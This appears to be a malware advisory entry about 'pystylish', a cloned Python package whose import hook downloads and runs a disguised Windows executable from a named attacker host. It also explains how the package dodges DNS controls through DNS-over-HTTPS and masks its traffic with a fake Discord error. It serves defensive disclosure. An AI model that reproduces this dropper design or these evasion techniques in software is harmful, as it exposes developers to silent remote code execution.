On import pystylish, the package's init.py spawns a daemon thread that downloads a Windows executable from https://goy.mikoz.xyz/boh3.exe, writes it to %TEMP%/vcredist_x86.exe (disguised as the Microsoft Visual C++ runtime installer), and executes it via subprocess.Popen. The domain is unrelated to the package's stated purpose (a terminal color/fade library) and is not a publisher-controlled host. To evade local DNS controls, the loader resolves the C2 domain through DNS-over-HTTPS (Cloudflare 1.1.1.1/dns-query and dns.google/resolve), then connects to the resolved IP with a manual Host header so /etc/hosts entries and sinkholes are bypassed. Error paths print a fake Failed to connect to discord.com:80 message regardless of the actual destination, providing cover for the unrelated outbound traffic. The package is a typosquat/clone of the legitimate pystyle library by billythegoat356 — README still points at github.com/billythegoat356/pystyle while the package is published under the name pystylish, and the library API is copied verbatim from pystyle with the dropper appended. Any developer who installs and imports pystylish (including transitively) will silently fetch and run an attacker-controlled binary on Windows.

Clone of a legitimate package. During import, the code downloads and executes a malicious executable.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-pystylish

Reasons (based on the campaign):

• Downloads and executes a remote executable.

• malware

• clones-real-package